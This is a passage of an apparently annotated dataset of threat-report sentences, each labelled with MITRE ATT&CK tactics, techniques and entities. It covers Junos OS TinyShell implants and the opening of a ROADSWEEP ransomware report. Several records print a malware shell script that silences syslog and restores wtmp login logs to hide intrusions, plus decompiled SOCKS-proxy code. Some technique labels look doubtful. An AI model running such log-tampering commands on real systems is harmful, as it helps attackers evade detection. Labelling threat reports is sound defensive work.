Tiny SHell source code here:", "sentence_text": "Command 3: tshd_runshell()", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Execute tshd_runshell() command for shell execution", "entities": [ { "text": "Command 3", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "tshd_runshell()", "start": 11, "end": 26, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p29-s447-31787c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 447, "context_before": "Command 3: tshd_runshell()", "sentence_text": "As the name suggests, this command is used to start a /bin/sh shell with history turned off.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Start /bin/sh shell with history disabled", "entities": [ { "text": "start a /bin/sh shell", "start": 46, "end": 67, "label": "Action" }, { "text": "history turned off", "start": 73, "end": 91, "label": "Action" }, { "text": "/bin/sh", "start": 54, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p29-s448-0b68e0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 448, "context_before": "As the name suggests, this command is used to start a /bin/sh shell with history turned off.", "sentence_text": "More details on this command can be obtained by looking at the TinyShell source code here:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p29-s449-379132", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 449, "context_before": "More details on this command can be obtained by looking at the TinyShell source code here:", "sentence_text": "Command 4: tshd_setproxy()\nThis command is used to execute a custom API tshd_setproxy().", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Execute tshd_setproxy() command for proxy configuration", "entities": [ { "text": "tshd_setproxy()", "start": 11, "end": 26, "label": "Infrastructure_Indicator" }, { "text": "Command 4", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "execute a custom API", "start": 51, "end": 71, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p29-s450-f2782b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 450, "context_before": "Command 4: tshd_setproxy()\nThis command is used to execute a custom API tshd_setproxy().", "sentence_text": "This API is used to create a SOCKS proxy between two IP addresses.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Create SOCKS proxy between two IP addresses", "entities": [ { "text": "create a SOCKS proxy", "start": 20, "end": 40, "label": "Action" }, { "text": "SOCKS proxy", "start": 29, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "between two IP addresses.", "start": 41, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p29-s451-b3bb9a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 451, "context_before": "This API is used to create a SOCKS proxy between two IP addresses.", "sentence_text": "One IP address is received from the C2 (which the to implant can presumably reach).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Receive target IP address from C2 for SOCKS proxy", "entities": [ { "text": "IP address is received from the C2", "start": 4, "end": 38, "label": "Action" }, { "text": "to implant can presumably reach", "start": 50, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p29-s452-755c66", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 452, "context_before": "One IP address is received from the C2 (which the to implant can presumably reach).", "sentence_text": "The other IP address is a randomly selected IP address from the to's in-memory configuration.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Select random IP from in-memory configuration for SOCKS proxy", "entities": [ { "text": " randomly selected IP address", "start": 25, "end": 54, "label": "Action" }, { "text": "in-memory configuration.", "start": 69, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "to's", "start": 64, "end": 68, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p29-s453-0ce054", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 453, "context_before": "The other IP address is a randomly selected IP address from the to's in-memory configuration.", "sentence_text": "The connection is made over an interface received from the C2 client.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Make connection over interface received from C2 client", "entities": [ { "text": " connection is made over an interface ", "start": 3, "end": 41, "label": "Action" }, { "text": "interface received from the C2 client.", "start": 31, "end": 69, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p29-s454-355251", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 29, "sentence_id": 454, "context_before": "The connection is made over an interface received from the C2 client.", "sentence_text": "The complete de-compiled source code for the tshd_setproxy() API can be found in Appendix B.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p30-s455-702890", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 455, "context_before": "The complete de-compiled source code for the tshd_setproxy() API can be found in Appendix B.", "sentence_text": "Command 5: tshd_config()", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Execute tshd_config() command for configuration management", "entities": [ { "text": "Command 5", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "tshd_config()", "start": 11, "end": 24, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p30-s456-f3bc2f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 456, "context_before": "Command 5: tshd_config()", "sentence_text": "The to contains an in-memory configuration which includes the following fields:\nField Description\nCB IP 1 An IP Address to connect back to in client mode CB", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "In-memory configuration with connect-back IP addresses", "entities": [ { "text": "client mode", "start": 142, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "CB IP 1", "start": 98, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "IP Address to connect back to", "start": 109, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "in-memory configuration", "start": 19, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p30-s458-9f506d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 458, "context_before": "IP 2", "sentence_text": "An IP Address to connect back to in client mode CB", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Additional connect-back IP address for client mode", "entities": [ { "text": "client mode", "start": 36, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "IP Address to connect back to", "start": 3, "end": 32, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p30-s460-bdf9d5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 460, "context_before": "IP 3", "sentence_text": "An IP Address to connect back to in client mode CB IP 4 An IP Address to connect back to in client mode CB PORT", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Multiple connect-back IPs and port configuration for client mode", "entities": [ { "text": "IP Address to connect back to", "start": 3, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "client mode", "start": 36, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "CB IP 4", "start": 48, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "CB PORT", "start": 104, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p30-s461-1e8595", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 461, "context_before": "An IP Address to connect back to in client mode...", "sentence_text": "The port to connect back to in client mode CB Interface", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p30-s462-d56a62", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 462, "context_before": "The port to connect back to in client mode CB Interface", "sentence_text": "The interface to be used for connections DELAY TIME", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Configure interface for connections and delay time", "entities": [ { "text": "DELAY TIME", "start": 41, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "interface to be used for connections", "start": 4, "end": 40, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p30-s463-50e047", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 463, "context_before": "The interface to be used for connections DELAY TIME", "sentence_text": "The delay time prior to start up The initial values for these fields are hard coded into the to binary.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1029", "name": "Scheduled Transfer" } ], "procedure": "Configure startup delay time with hard-coded initial values", "entities": [ { "text": "delay time prior to start up", "start": 4, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "to binary.", "start": 93, "end": 103, "label": "MalwareTool" }, { "text": "initial values for these fields are hard coded", "start": 37, "end": 83, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p30-s464-e21363", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 464, "context_before": "The delay time prior to start up The initial values for these fields are hard coded into the to binary.", "sentence_text": "However, these values can be changed at any time using the tshd_config() API which can be triggered using this command.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Dynamically update configuration using tshd_config() API", "entities": [ { "text": "values can be changed at any time", "start": 15, "end": 48, "label": "Action" }, { "text": "tshd_config() API ", "start": 59, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "triggered using this command.", "start": 90, "end": 119, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p30-s465-d90e11", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 465, "context_before": "However, these values can be changed at any time using the tshd_config() API which can be triggered using this command.", "sentence_text": "The assumption is that a custom Tiny SHell Client is used to communicate with this implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Custom TinyShell client is used to communicate with the implant for remote control.", "entities": [ { "text": "Tiny SHell Client", "start": 32, "end": 49, "label": "MalwareTool" }, { "text": "is used to communicate with this implant", "start": 50, "end": 90, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p30-s466-9dcbcc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 30, "sentence_id": 466, "context_before": "The assumption is that a custom Tiny SHell Client is used to communicate with this implant.", "sentence_text": "Call Graph\nThe call graph for the to implant is given below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s467-e2d49b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 467, "context_before": "Call Graph\nThe call graph for the to implant is given below.", "sentence_text": "This is because this interface is available only on Juniper Networks' devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s468-837aa5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 468, "context_before": "This is because this interface is available only on Juniper Networks' devices.", "sentence_text": "There are no other indicators of specific actions taking place which might be tethered to the Junos OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s469-f512aa", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 469, "context_before": "There are no other indicators of specific actions taking place which might be tethered to the Junos OS.", "sentence_text": "Conclusion\nWe identified two generic Remote Access Toolkits, jdosd and irad.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s470-ad4b04", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 470, "context_before": "Conclusion\nWe identified two generic Remote Access Toolkits, jdosd and irad.", "sentence_text": "A Local Access Toolkit (lmpad) was also discovered that appears to be specifically engineered to attack Junos OS devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s471-d77991", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 471, "context_before": "A Local Access Toolkit (lmpad) was also discovered that appears to be specifically engineered to attack Junos OS devices.", "sentence_text": "All these implants are designed for the exact same purpose, to provide persistent backdoors on long-running Junos OS devices.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Provide persistent backdoors on Junos OS devices", "entities": [ { "text": "implants", "start": 10, "end": 18, "label": "MalwareTool" }, { "text": "provide persistent backdoors", "start": 63, "end": 91, "label": "Action" }, { "text": "long-running Junos OS devices.", "start": 95, "end": 125, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p31-s472-99bfaa", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 472, "context_before": "All these implants are designed for the exact same purpose, to provide persistent backdoors on long-running Junos OS devices.", "sentence_text": "We recommend that customers remain vigilant and refresh router software and hardware at regular intervals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s473-30bb95", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 473, "context_before": "We recommend that customers remain vigilant and refresh router software and hardware at regular intervals.", "sentence_text": "Monitor Juniper Security Advisories and consider upgrading to the set of Junos OS releases cited in JSA93446, which contain the CVE fix as well as updated signatures for the JMRT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s474-59fb5f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 474, "context_before": "Monitor Juniper Security Advisories and consider upgrading to the set of Junos OS releases cited in JSA93446, which contain the CVE fix as well as updated signatures for the JMRT.", "sentence_text": "Run the JMRT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p31-s475-dd16af", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 31, "sentence_id": 475, "context_before": "Run the JMRT.", "sentence_text": "Any malware infections should be reported to Juniper Networks by contacting the Juniper Networks Security Incident Response (SIRT) Team at .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p32-s476-611554", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 32, "sentence_id": 476, "context_before": "Any malware infections should be reported to Juniper Networks by contacting the Juniper Networks Security Incident Response (SIRT) Team at .", "sentence_text": "Appendices\nAppendix A: LMPAD Deployed Shell Script pre_ssh() { #closelog cp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0 sed -i '' 's/\\/dev\\/null #//g' /mfs/var/etc/syslog.conf0 sed -i '' 's/ / \\/dev\\/null #/g' /mfs/var/etc/syslog.conf ps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1 #last cp -r /var/log/utx.log /var/log/utx.log0 cp -r /var/log/wtmp /var/log/wtmp0 }", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Execute LMPAD shell script for log manipulation and process termination", "entities": [ { "text": "LMPAD", "start": 23, "end": 28, "label": "MalwareTool" }, { "text": "/var/log/wtmp", "start": 353, "end": 366, "label": "Infrastructure_Indicator" }, { "text": "kill -1", "start": 292, "end": 299, "label": "Action" }, { "text": "cp -r /var/log/utx.log", "start": 306, "end": 328, "label": "Action" }, { "text": "sed -i '' 's/ / \\/dev\\/null #/g' ", "start": 184, "end": 217, "label": "Action" }, { "text": " cp /mfs/var/etc/syslog.conf ", "start": 72, "end": 101, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p32-s477-3e409f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 32, "sentence_id": 477, "context_before": "Appendices\nAppendix A: LMPAD Deployed Shell Script pre_ssh() { #closelog cp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0 sed -i '' 's/\\/dev\\/null #//g' /mfs/var/etc/syslog.conf0 sed -i '' 's/ / \\/dev\\/null #/g' /mfs/var/etc/syslog.conf ps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1 #last cp -r /var/log/utx.log /var/log/utx.log0 cp -r /var/log/wtmp /var/log/wtmp0 }", "sentence_text": "post_ssh() { #relog cp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf rm -f /mfs/var/etc/syslog.conf0 ps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1 #relast cp -r /var/log/wtmp0 /var/log/wtmp cp -r /var/log/utx.log /var/log/utx.log0 rm -f /var/log/wtmp0 } backup() { #backconf rm -rf /var/rundb+ cp -r /var/rundb /var/rundb+ cp /var/db/commits /usr/lib/libjucomm.so.1 tar -cf /config/usage_db /config/juniper.conf.*", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Execute post-exploitation cleanup and configuration backup", "entities": [ { "text": "cp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf rm -f /mfs/var/etc/syslog.conf0", "start": 20, "end": 105, "label": "Action" }, { "text": "kill -1", "start": 157, "end": 164, "label": "Action" }, { "text": "cp -r /var/log/wtmp0 /var/log/wtmp", "start": 173, "end": 207, "label": "Action" }, { "text": "cp -r /var/log/utx.log /var/log/utx.log0", "start": 208, "end": 248, "label": "Action" }, { "text": " rm -rf /var/rundb", "start": 292, "end": 310, "label": "Action" }, { "text": "cp -r /var/rundb /var/rundb", "start": 312, "end": 339, "label": "Action" }, { "text": "tar -cf /config/usage_db /config/juniper.conf.*", "start": 384, "end": 431, "label": "Action" }, { "text": "/var/rundb", "start": 318, "end": 328, "label": "Infrastructure_Indicator" }, { "text": "/var/rundb", "start": 329, "end": 339, "label": "Infrastructure_Indicator" }, { "text": "config/juniper.conf.*", "start": 410, "end": 431, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p32-s478-980f6d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 32, "sentence_id": 478, "context_before": "post_ssh() { #relog cp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf rm -f /mfs/var/etc/syslog.conf0 ps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1 #relast cp -r /var/log/wtmp0 /var/log/wtmp cp -r /var/log/utx.log /var/log/utx.log0 rm -f /var/log/wtmp0 } backup() { #backconf rm -rf /var/rundb+ cp -r /var/rundb /var/rundb+ cp /var/db/commits /usr/lib/libjucomm.so.1 tar -cf /config/usage_db /config/juniper.conf.*", "sentence_text": "tar -cf /var/db/config/usage_db /var/db/config/juniper.conf.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Archive Juniper configuration files for collection", "entities": [ { "text": "tar -cf /var/db/config/usage_db /var/db/config/juniper.conf.", "start": 0, "end": 60, "label": "Action" }, { "text": "var/db/config/usage_db", "start": 9, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "var/db/config/juniper.conf.", "start": 33, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p32-s479-0f7868", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 32, "sentence_id": 479, "context_before": "tar -cf /var/db/config/usage_db /var/db/config/juniper.conf.", "sentence_text": "* } restore() { #reconfig cp -r /var/rundb+/* /var/rundb cp /usr/lib/libjucomm.so.1 /var/db/commits tar -xf /config/usage_db -C / tar -xf /var/db/config/usage_db -C / rm -r /var/rundb+ rm -f /usr/lib/libjucomm.so.1 rm -f /config/", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Execute configuration restoration and cleanup operations", "entities": [ { "text": "cp -r /var/rundb+/* /var/rundb", "start": 26, "end": 56, "label": "Action" }, { "text": "cp /usr/lib/libjucomm.so.1 /var/db/commits", "start": 57, "end": 99, "label": "Action" }, { "text": "tar -xf /config/usage_db -C", "start": 100, "end": 127, "label": "Action" }, { "text": "rm -r /var/rundb+", "start": 167, "end": 184, "label": "Action" }, { "text": "rm -f /usr/lib/libjucomm.so.1", "start": 185, "end": 214, "label": "Action" }, { "text": "rm -f /config/", "start": 215, "end": 229, "label": "Action" }, { "text": "/var/rundb", "start": 173, "end": 183, "label": "Infrastructure_Indicator" }, { "text": "/usr/lib/libjucomm.so.1", "start": 191, "end": 214, "label": "Infrastructure_Indicator" }, { "text": "/config/usage_db", "start": 108, "end": 124, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p32-s480-84678d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 32, "sentence_id": 480, "context_before": "* } restore() { #reconfig cp -r /var/rundb+/* /var/rundb cp /usr/lib/libjucomm.so.1 /var/db/commits tar -xf /config/usage_db -C / tar -xf /var/db/config/usage_db -C / rm -r /var/rundb+ rm -f /usr/lib/libjucomm.so.1 rm -f /config/", "sentence_text": "usage_db rm -f /var/db/config/usage_db } if [ $1 = \"pre\" ]; then pre_ssh elif [ $1 = \"post\" ]; then post_ssh elif [ $1 = \"backup\" ]; then backup elif [ $1 = \"restore\" ]; then restore fi echo done exit 0", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Execute conditional script operations based on command argument", "entities": [ { "text": "if [ $1 = \"pre\" ]; then pre_ssh", "start": 41, "end": 72, "label": "Action" }, { "text": "elif [ $1 = \"post\" ]; then post_ssh", "start": 73, "end": 108, "label": "Action" }, { "text": "elif [ $1 = \"backup\" ]; then backup", "start": 109, "end": 144, "label": "Action" }, { "text": "elif [ $1 = \"restore\" ]; then restore", "start": 145, "end": 182, "label": "Action" }, { "text": "echo done exit 0", "start": 186, "end": 202, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p33-s481-d199b4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 33, "sentence_id": 481, "context_before": "usage_db rm -f /var/db/config/usage_db } if [ $1 = \"pre\" ]; then pre_ssh elif [ $1 = \"post\" ]; then post_ssh elif [ $1 = \"backup\" ]; then backup elif [ $1 = \"restore\" ]; then restore fi echo done exit 0", "sentence_text": "Appendix B: tshd_setproxy() Source Code See overleaf on next page.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p34-s482-9cda40", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 34, "sentence_id": 482, "context_before": "Appendix B: tshd_setproxy() Source Code See overleaf on next page.", "sentence_text": "int tshd_setproxy(int server_sock)\n{\nint sock_fd;\nint sock2;\nint ret2;\nchar *iface_name_ptr;\nsockaddr_in addr2;\nsockaddr_in addr1;\nchar addr_str [28];\nint rc;\nchar iface_name", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "tshd_setproxy() function implementation for SOCKS proxy setup", "entities": [ { "text": "tshd_setproxy(int server_sock)", "start": 4, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "sock_fd", "start": 41, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "sockaddr_in", "start": 93, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "iface_name", "start": 164, "end": 174, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p34-s483-7286be", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 34, "sentence_id": 483, "context_before": "int tshd_setproxy(int server_sock)\n{\nint sock_fd;\nint sock2;\nint ret2;\nchar *iface_name_ptr;\nsockaddr_in addr2;\nsockaddr_in addr1;\nchar addr_str [28];\nint rc;\nchar iface_name", "sentence_text": "[32];\nundefined local_12c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p34-s484-05dad6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 34, "sentence_id": 484, "context_before": "[32];\nundefined local_12c", "sentence_text": "[256];\nchar buf", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p34-s485-18dbe0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 34, "sentence_id": 485, "context_before": "[256];\nchar buf", "sentence_text": "= 0; sock_fd = sock_fd + -1) {", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p34-s487-4726bf", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 34, "sentence_id": 487, "context_before": "WARNING:", "sentence_text": "Subroutine does not return */ exit(0);\n}\nsock2 = pel_server_init(sock_fd,socks_secret);\nif (sock2 !", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Initialize SOCKS proxy server using pel_server_init() with secret", "entities": [ { "text": "pel_server_init(sock_fd,socks_secret);", "start": 49, "end": 87, "label": "Action" }, { "text": "exit(0)", "start": 30, "end": 37, "label": "Action" }, { "text": "sock2", "start": 41, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "socks_secret", "start": 73, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p34-s488-55b61b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 34, "sentence_id": 488, "context_before": "Subroutine does not return */ exit(0);\n}\nsock2 = pel_server_init(sock_fd,socks_secret);\nif (sock2 !", "sentence_text": "= 1) { close(sock_fd);", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p35-s491-7f6792", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 35, "sentence_id": 491, "context_before": "WARNING:", "sentence_text": "Subroutine does not return */ exit(0);\n}\nclose(sock2);\nclose(sock_fd);\n/* WARNING:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p35-s492-dcd136", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 35, "sentence_id": 492, "context_before": "Subroutine does not return */ exit(0);\n}\nclose(sock2);\nclose(sock_fd);\n/* WARNING:", "sentence_text": "Subroutine does not return */ exit(0);\n}\nclose(sock2);\nclose(sock_fd);\n/* WARNING:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p35-s493-33ae3c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 35, "sentence_id": 493, "context_before": "Subroutine does not return */ exit(0);\n}\nclose(sock2);\nclose(sock_fd);\n/* WARNING:", "sentence_text": "Subroutine does not return */ exit(0);\n}\n}\n}\n}\n}\nreturn -1;\n}", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s1-b75a2e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "ROADSWEEP Ransomware Targets the Albanian Government |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s2-7d3ec9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "ROADSWEEP Ransomware Targets the Albanian Government |", "sentence_text": "This activity is a geographic expansion of Iranian disruptive cyber operations, conducted against a NATO member state.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Iranian disruptive cyber operations geographic expansion against NATO member", "entities": [ { "text": "Iranian", "start": 43, "end": 50, "label": "ThreatActor" }, { "text": "geographic expansion of Iranian disruptive cyber operations", "start": 19, "end": 78, "label": "Action" }, { "text": "NATO member state.", "start": 100, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s3-25a336", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "This activity is a geographic expansion of Iranian disruptive cyber operations, conducted against a NATO member state.", "sentence_text": "It may indicate an increased tolerance of risk when employing disruptive tools against countries perceived to be working against Iranian interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s4-79a7aa", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "It may indicate an increased tolerance of risk when employing disruptive tools against countries perceived to be working against Iranian interests.", "sentence_text": "Threat Detail\nIn mid-July 2022, Mandiant identified a new ransomware family dubbed ROADSWEEP which drops a politically themed ransom note suggesting it targeted the Albanian government.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data 